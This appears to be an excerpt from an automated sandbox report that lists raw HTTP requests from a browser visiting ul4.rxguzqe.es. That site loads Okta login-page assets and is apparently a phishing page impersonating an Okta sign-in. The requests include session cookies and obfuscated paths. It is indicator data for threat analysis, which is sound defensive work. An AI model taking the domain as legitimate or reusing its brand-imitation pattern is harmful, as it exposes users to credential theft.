Source: global traffic	HTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://ul4.rxguzqe.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://ul4.rxguzqe.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveOrigin: https://ul4.rxguzqe.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveOrigin: https://ul4.rxguzqe.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /56jG4XNNDAO5EHGBZuuEYk4kl7ei2SISKN55wvYQ67109 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wx37Ih4Qf4h6cOyfopr85pqVRbjfhu34130 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /qrSeQ9WNa83sBaRUabcJefYNpK5yoeSAm8FGWwJV67140 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250414%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250414T195225Z&X-Amz-Expires=300&X-Amz-Signature=7a18d0b9982543c92273bec38caa741552afe8f379aee224eed7b6cf86b46545&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ul4.rxguzqe.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mnhGeASw0P7e2SRJqeklVOTtKyDrA2ULcwo8dpGkV90145 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mn7RjdpKvbcWXIn9jsM7gS7A06HnJp4XAm5uKaTw56hUFbJjE4u7m6fx8mnStxyiuHOfaa6uv220 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /kltjWfU0lKC39xDyak2Gelrfz3gf5NrRgoFiAXdws4vs4tvopcIZjtSdmuJsyZb7UZoPJDcbE4Jyz227 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ij09BSrCOT3cmMjwG8oOvyhc8gVb8ESF6mkcdJUQ5rTrMaMAEd5FVqxgDNq56170 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /qrSeQ9WNa83sBaRUabcJefYNpK5yoeSAm8FGWwJV67140 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wx37Ih4Qf4h6cOyfopr85pqVRbjfhu34130 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /yz9RwwiMcKxpChoIkhs5q7X0QtmnUFDD6mIlTg0P5M496VwGoab179 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; 